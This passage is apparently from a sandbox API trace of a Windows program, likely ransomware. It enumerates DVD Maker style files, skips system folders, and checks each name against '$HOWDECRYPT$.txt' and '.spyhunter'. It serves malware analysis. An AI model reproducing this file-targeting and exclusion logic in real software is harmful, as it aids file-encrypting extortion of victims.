lstrlenW (lpString="System Volume Information") returned 25 [0092.418] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png") returned 81 [0092.418] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.418] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.418] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.418] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png") returned 81 [0092.418] GetProcessHeap () returned 0x2c0000 [0092.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f328 [0092.418] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.418] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.418] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="Windows") returned -1 [0092.418] lstrlenW (lpString="Windows") returned 7 [0092.418] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="$Recycle.bin") returned 1 [0092.418] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.418] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="System Volume Information") returned -1 [0092.418] lstrlenW (lpString="System Volume Information") returned 25 [0092.418] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 82 [0092.418] StrStrIW (lpFirst="16_9-frame-image-mask.png", lpSrch=".spyhunter") returned 0x0 [0092.418] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.418] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="_uninstalling_.png") returned 1 [0092.418] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 82 [0092.418] GetProcessHeap () returned 0x2c0000 [0092.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f058 [0092.419] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.419] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.419] lstrcmpiW (lpString1="babypink.png", lpString2="Windows") returned -1 [0092.419] lstrlenW (lpString="Windows") returned 7 [0092.419] lstrcmpiW (lpString1="babypink.png", lpString2="$Recycle.bin") returned 1 [0092.419] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.419] lstrcmpiW (lpString1="babypink.png", lpString2="System Volume Information") returned -1 [0092.419] lstrlenW (lpString="System Volume Information") returned 25 [0092.419] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 69 [0092.419] StrStrIW (lpFirst="babypink.png", lpSrch=".spyhunter") returned 0x0 [0092.419] lstrcmpW (lpString1="babypink.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.419] lstrcmpW (lpString1="babypink.png", lpString2="_uninstalling_.png") returned 1 [0092.419] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 69 [0092.419] GetProcessHeap () returned 0x2c0000 [0092.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e200 [0092.419] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0092.419] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.419] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0092.419] lstrlenW (lpString="Windows") returned 7 [0092.419] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0092.419] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.419] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0092.420] lstrlenW (lpString="System Volume Information") returned 25 [0092.420] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 71 [0092.420] StrStrIW (lpFirst="background.png", lpSrch=".spyhunter") returned 0x0 [0092.420] lstrcmpW (lpString1="background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.420] lstrcmpW (lpString1="background.png", lpString2="_uninstalling_.png") returned 1 [0092.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 71 [0092.420] GetProcessHeap () returned 0x2c0000 [0092.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e3b0 [0092.420] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.420] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.420] lstrcmpiW (lpString1="bear_formatted_matte2.wmv", lpString2="Windows") returned -1 [0092.420] lstrlenW (lpString="Windows") returned 7 [0092.420] lstrcmpiW (lpString1="bear_formatted_matte2.wmv", lpString2="$Recycle.bin") returned 1 [0092.420] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.420] lstrcmpiW (lpString1="bear_formatted_matte2.wmv", lpString2="System Volume Information") returned -1 [0092.420] lstrlenW (lpString="System Volume Information") returned 25 [0092.420] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv") returned 82 [0092.420] StrStrIW (lpFirst="bear_formatted_matte2.wmv", lpSrch=".spyhunter") returned 0x0 [0092.420] lstrcmpW (lpString1="bear_formatted_matte2.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.420] lstrcmpW (lpString1="bear_formatted_matte2.wmv", lpString2="_uninstalling_.png") returned 1 [0092.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv") returned 82 [0092.420] GetProcessHeap () returned 0x2c0000 [0092.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f238 [0092.420] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.421] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.421] lstrcmpiW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="Windows") returned -1 [0092.421] lstrlenW (lpString="Windows") returned 7 [0092.421] lstrcmpiW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.421] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.421] lstrcmpiW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.421] lstrlenW (lpString="System Volume Information") returned 25 [0092.421] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 86 [0092.421] StrStrIW (lpFirst="Bear_Formatted_MATTE2_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.421] lstrcmpW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.421] lstrcmpW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 86 [0092.423] GetProcessHeap () returned 0x2c0000 [0092.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3555a0 [0092.423] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.423] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.424] lstrcmpiW (lpString1="bear_formatted_rgb6.wmv", lpString2="Windows") returned -1 [0092.424] lstrlenW (lpString="Windows") returned 7 [0092.424] lstrcmpiW (lpString1="bear_formatted_rgb6.wmv", lpString2="$Recycle.bin") returned 1 [0092.424] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.424] lstrcmpiW (lpString1="bear_formatted_rgb6.wmv", lpString2="System Volume Information") returned -1 [0092.424] lstrlenW (lpString="System Volume Information") returned 25 [0092.424] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv") returned 80 [0092.424] StrStrIW (lpFirst="bear_formatted_rgb6.wmv", lpSrch=".spyhunter") returned 0x0 [0092.424] lstrcmpW (lpString1="bear_formatted_rgb6.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.424] lstrcmpW (lpString1="bear_formatted_rgb6.wmv", lpString2="_uninstalling_.png") returned 1 [0092.424] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv") returned 80 [0092.424] GetProcessHeap () returned 0x2c0000 [0092.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f418 [0092.424] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.424] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.424] lstrcmpiW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="Windows") returned -1 [0092.424] lstrlenW (lpString="Windows") returned 7 [0092.424] lstrcmpiW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.424] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.424] lstrcmpiW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.424] lstrlenW (lpString="System Volume Information") returned 25 [0092.424] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 84 [0092.424] StrStrIW (lpFirst="Bear_Formatted_RGB6_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.425] lstrcmpW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.425] lstrcmpW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.425] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 84 [0092.425] GetProcessHeap () returned 0x2c0000 [0092.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x355698 [0092.425] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.425] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.425] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0092.425] lstrlenW (lpString="Windows") returned 7 [0092.425] lstrcmpiW (lpString1="btn-back-static.png", lpString2="$Recycle.bin") returned 1 [0092.425] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.425] lstrcmpiW (lpString1="btn-back-static.png", lpString2="System Volume Information") returned -1 [0092.425] lstrlenW (lpString="System Volume Information") returned 25 [0092.425] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 76 [0092.425] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".spyhunter") returned 0x0 [0092.425] lstrcmpW (lpString1="btn-back-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.425] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0092.425] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 76 [0092.425] GetProcessHeap () returned 0x2c0000 [0092.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3780d8 [0092.425] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.425] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.425] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0092.425] lstrlenW (lpString="Windows") returned 7 [0092.426] lstrcmpiW (lpString1="btn-next-static.png", lpString2="$Recycle.bin") returned 1 [0092.426] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.426] lstrcmpiW (lpString1="btn-next-static.png", lpString2="System Volume Information") returned -1 [0092.426] lstrlenW (lpString="System Volume Information") returned 25 [0092.426] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 76 [0092.426] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".spyhunter") returned 0x0 [0092.426] lstrcmpW (lpString1="btn-next-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.426] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0092.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 76 [0092.426] GetProcessHeap () returned 0x2c0000 [0092.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3781c0 [0092.426] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0092.426] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.426] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0092.426] lstrlenW (lpString="Windows") returned 7 [0092.426] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="$Recycle.bin") returned 1 [0092.426] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.426] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="System Volume Information") returned -1 [0092.426] lstrlenW (lpString="System Volume Information") returned 25 [0092.426] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 80 [0092.426] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".spyhunter") returned 0x0 [0092.426] lstrcmpW (lpString1="btn-previous-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.426] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0092.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 80 [0092.426] GetProcessHeap () returned 0x2c0000 [0092.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f5f8 [0092.427] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0092.427] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.427] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0092.427] lstrlenW (lpString="Windows") returned 7 [0092.427] lstrcmpiW (lpString1="button-highlight.png", lpString2="$Recycle.bin") returned 1 [0092.427] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.427] lstrcmpiW (lpString1="button-highlight.png", lpString2="System Volume Information") returned -1 [0092.427] lstrlenW (lpString="System Volume Information") returned 25 [0092.427] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png") returned 77 [0092.427] StrStrIW (lpFirst="button-highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.427] lstrcmpW (lpString1="button-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.427] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.427] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png") returned 77 [0092.427] GetProcessHeap () returned 0x2c0000 [0092.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3782a8 [0092.427] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0092.427] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.427] lstrcmpiW (lpString1="chapters-static.png", lpString2="Windows") returned -1 [0092.427] lstrlenW (lpString="Windows") returned 7 [0092.427] lstrcmpiW (lpString1="chapters-static.png", lpString2="$Recycle.bin") returned 1 [0092.427] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.428] lstrcmpiW (lpString1="chapters-static.png", lpString2="System Volume Information") returned -1 [0092.428] lstrlenW (lpString="System Volume Information") returned 25 [0092.428] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png") returned 76 [0092.428] StrStrIW (lpFirst="chapters-static.png", lpSrch=".spyhunter") returned 0x0 [0092.428] lstrcmpW (lpString1="chapters-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.428] lstrcmpW (lpString1="chapters-static.png", lpString2="_uninstalling_.png") returned 1 [0092.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png") returned 76 [0092.428] GetProcessHeap () returned 0x2c0000 [0092.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x378390 [0092.428] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.428] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.428] lstrcmpiW (lpString1="content-background.png", lpString2="Windows") returned -1 [0092.428] lstrlenW (lpString="Windows") returned 7 [0092.428] lstrcmpiW (lpString1="content-background.png", lpString2="$Recycle.bin") returned 1 [0092.428] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.428] lstrcmpiW (lpString1="content-background.png", lpString2="System Volume Information") returned -1 [0092.428] lstrlenW (lpString="System Volume Information") returned 25 [0092.428] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 79 [0092.428] StrStrIW (lpFirst="content-background.png", lpSrch=".spyhunter") returned 0x0 [0092.428] lstrcmpW (lpString1="content-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.428] lstrcmpW (lpString1="content-background.png", lpString2="_uninstalling_.png") returned 1 [0092.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 79 [0092.428] GetProcessHeap () returned 0x2c0000 [0092.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x378478 [0092.429] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0092.429] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.429] lstrcmpiW (lpString1="content-foreground.png", lpString2="Windows") returned -1 [0092.429] lstrlenW (lpString="Windows") returned 7 [0092.429] lstrcmpiW (lpString1="content-foreground.png", lpString2="$Recycle.bin") returned 1 [0092.429] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.429] lstrcmpiW (lpString1="content-foreground.png", lpString2="System Volume Information") returned -1 [0092.429] lstrlenW (lpString="System Volume Information") returned 25 [0092.429] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 79 [0092.430] StrStrIW (lpFirst="content-foreground.png", lpSrch=".spyhunter") returned 0x0 [0092.431] lstrcmpW (lpString1="content-foreground.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.431] lstrcmpW (lpString1="content-foreground.png", lpString2="_uninstalling_.png") returned 1 [0092.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 79 [0092.431] GetProcessHeap () returned 0x2c0000 [0092.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x378560 [0092.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0092.431] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.431] lstrcmpiW (lpString1="curtains.png", lpString2="Windows") returned -1 [0092.431] lstrlenW (lpString="Windows") returned 7 [0092.431] lstrcmpiW (lpString1="curtains.png", lpString2="$Recycle.bin") returned 1 [0092.431] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.431] lstrcmpiW (lpString1="curtains.png", lpString2="System Volume Information") returned -1 [0092.431] lstrlenW (lpString="System Volume Information") returned 25 [0092.431] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 69 [0092.431] StrStrIW (lpFirst="curtains.png", lpSrch=".spyhunter") returned 0x0 [0092.431] lstrcmpW (lpString1="curtains.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.431] lstrcmpW (lpString1="curtains.png", lpString2="_uninstalling_.png") returned 1 [0092.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 69 [0092.431] GetProcessHeap () returned 0x2c0000 [0092.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e560 [0092.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0092.432] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.432] lstrcmpiW (lpString1="flower_precomp_matte.wmv", lpString2="Windows") returned -1 [0092.432] lstrlenW (lpString="Windows") returned 7 [0092.432] lstrcmpiW (lpString1="flower_precomp_matte.wmv", lpString2="$Recycle.bin") returned 1 [0092.432] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.432] lstrcmpiW (lpString1="flower_precomp_matte.wmv", lpString2="System Volume Information") returned -1 [0092.432] lstrlenW (lpString="System Volume Information") returned 25 [0092.432] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 81 [0092.432] StrStrIW (lpFirst="flower_precomp_matte.wmv", lpSrch=".spyhunter") returned 0x0 [0092.432] lstrcmpW (lpString1="flower_precomp_matte.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.432] lstrcmpW (lpString1="flower_precomp_matte.wmv", lpString2="_uninstalling_.png") returned 1 [0092.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 81 [0092.432] GetProcessHeap () returned 0x2c0000 [0092.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f6e8 [0092.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0092.432] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.433] lstrcmpiW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="Windows") returned -1 [0092.433] lstrlenW (lpString="Windows") returned 7 [0092.433] lstrcmpiW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.433] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.433] lstrcmpiW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.433] lstrlenW (lpString="System Volume Information") returned 25 [0092.433] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv") returned 85 [0092.433] StrStrIW (lpFirst="flower_PreComp_MATTE_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.433] lstrcmpW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.433] lstrcmpW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv") returned 85 [0092.433] GetProcessHeap () returned 0x2c0000 [0092.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x355790 [0092.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0092.433] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.433] lstrcmpiW (lpString1="flower_trans_matte.wmv", lpString2="Windows") returned -1 [0092.433] lstrlenW (lpString="Windows") returned 7 [0092.433] lstrcmpiW (lpString1="flower_trans_matte.wmv", lpString2="$Recycle.bin") returned 1 [0092.434] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.434] lstrcmpiW (lpString1="flower_trans_matte.wmv", lpString2="System Volume Information") returned -1 [0092.434] lstrlenW (lpString="System Volume Information") returned 25 [0092.434] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv") returned 79 [0092.434] StrStrIW (lpFirst="flower_trans_matte.wmv", lpSrch=".spyhunter") returned 0x0 [0092.434] lstrcmpW (lpString1="flower_trans_matte.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.434] lstrcmpW (lpString1="flower_trans_matte.wmv", lpString2="_uninstalling_.png") returned 1 [0092.434] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv") returned 79 [0092.434] GetProcessHeap () returned 0x2c0000 [0092.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x378648 [0092.434] RtlReAllocateHeap (Heap=0x2c0000, 